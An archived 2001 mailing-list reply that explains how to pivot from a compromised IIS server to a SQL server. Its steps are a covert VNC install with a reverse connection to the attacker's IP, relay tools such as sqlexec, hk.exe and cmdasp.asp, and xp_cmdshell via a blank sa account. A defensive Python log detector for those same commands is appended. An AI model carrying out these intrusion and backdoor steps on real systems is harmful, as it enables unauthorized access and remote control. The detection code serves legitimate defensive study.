-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

There are a few ways to go about this:

1. Upload a tool to the IIS box which runs a SQL query against the database server. You could try sqlexec.exe (packetstorm) or even create an ASP script on the server which relays a request to the database server. If the /msadc RDS component is available you can try using my sqlrds.pl tool to relay a request to the server through that. The sqlrds.pl script is available from http://www.digitaloffense.net/csw/

2. Get a GUI interface on the IIS server. Install VNC on the IIS server after elevating your access with hk.exe or cmdasp.asp. You can run the VNC server in outbound mode and run the client in listen mode, so that should get you through the firewall. To install VNC remotely:

   a. Install VNC on a local machine, set a password and any options.
   b. Open RegEdit, export the HKLM/Software/ORL key to a file.
   c. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to the target's \winnt\system32 directory.
   d. Copy your exported registry file to the target, import with regedit <filename>.reg
   e. Execute winvnc -install on the target system.
   f. Execute net start winvnc
   g. Execute vncviewer -listen on the attacking system.
   h. Execute winvnc -connect <your ip> and enjoy your desktop ;)

3. Owning the SQL server. With a blank "sa" account, this should be trivial. Just execute the xp_cmdshell stored procedure and follow the above steps to get a VNC desktop.

For more info, check out my CanSecWest/core01 presentation, available online at http://www.digitaloffense.net/csw/ or read the excellent material available from http://www.sqlsecurity.com/

- -HD
Senior Security Analyst
Digital Defense Incorporated
http://www.digitaldefense.net/

On Wednesday 11 April 2001 10:52 pm, myrddin_eat_private wrote:
> Once I have done this, the only traffic into the internal network allowed
> from the IIS server will be on port 1433. The SQL server will have a blank
> 'sa' password. How would I then proceed to bust the SQL server? I know I
> can do this if I install Perl on the IIS server and place the needed tools
> on the box, but that requires GUI access to the IIS server (right?). Other
> than setting up a port redirector like FPipe, how would you go about this?
>
> Free, encrypted, secure Web-based email at www.hushmail.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQA/AwUBOtZ4WTwRvqMPEDLhEQImKgCfSCpzTLunnAc0jF9GhrkRCbwHJ9gAoIsH
Fy1y25z9JgJ7LvpLbLi6VrAu
=gcga
-----END PGP SIGNATURE-----
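From the defender's side, every step in the reply above leaves a host-side trace: a registry import, a service installation and start, a VNC process connecting outbound, and xp_cmdshell running on the database server. The following is an added example, not code from the thread or from either poster, that matches those command strings against log lines and flags a host on which the whole VNC reverse-desktop sequence has appeared. The log format ("<host> <source> <message>") and the sample lines are constructed for illustration; the regular expressions are this example's own.

```python
import re

# Each rule: (name, compiled pattern). The command strings come from the
# steps in the reply above; the patterns themselves are this example's own.
RULES = [
    ("vnc_service_install", re.compile(r"\bwinvnc(\.exe)?\s+-install\b", re.I)),
    ("vnc_service_start", re.compile(r"\bnet\s+start\s+winvnc\b", re.I)),
    ("vnc_reverse_connect", re.compile(r"\bwinvnc(\.exe)?\s+-connect\s+\S+", re.I)),
    ("registry_import", re.compile(r"\bregedit(\.exe)?\s+\S+\.reg\b", re.I)),
    ("mssql_xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
]

# Rule names that together show the full VNC reverse-desktop sequence
# (install service, start service, connect back out) on a single host.
VNC_CHAIN = {"vnc_service_install", "vnc_service_start", "vnc_reverse_connect"}

# Constructed sample log lines; assumed layout is "<host> <source> <message>".
SAMPLE_LINES = [
    "iis01 cmdline C:\\WINNT\\system32\\regedit.exe vnc.reg",
    "iis01 cmdline C:\\WINNT\\system32\\winvnc.exe -install",
    "iis01 cmdline net start winvnc",
    "iis01 cmdline winvnc -connect 203.0.113.5",
    "sql01 mssql EXEC master..xp_cmdshell 'dir c:\\'",
    "iis01 cmdline notepad.exe readme.txt",
]


def parse(line):
    """Split one line into (host, source, message) under the assumed layout."""
    host, source, message = line.strip().split(" ", 2)
    return host, source, message


def scan(lines):
    """Return one (host, rule_name, message) tuple per rule that matches a line."""
    hits = []
    for line in lines:
        host, _source, message = parse(line)
        for name, pattern in RULES:
            if pattern.search(message):
                hits.append((host, name, message))
    return hits


def vnc_chain_complete(hits, host):
    """True when install, start and reverse-connect were all seen on `host`."""
    seen = {name for h, name, _ in hits if h == host}
    return VNC_CHAIN <= seen


def hosts_with_vnc_chain(hits):
    """Sorted list of hosts on which the complete VNC sequence was observed."""
    return sorted({h for h, _, _ in hits if vnc_chain_complete(hits, h)})


if __name__ == "__main__":
    found = scan(SAMPLE_LINES)
    for host, name, message in found:
        print(f"{host:6} {name:20} {message}")
    print("full VNC chain on:", hosts_with_vnc_chain(found))
```

Single hits are worth a look on their own (xp_cmdshell on a database server that never runs it, a service install on a web server), but the chain check is what separates an administrator installing VNC from the sequence the reply describes: install, start, and then an outbound connect from the service.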
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:18:06 PDT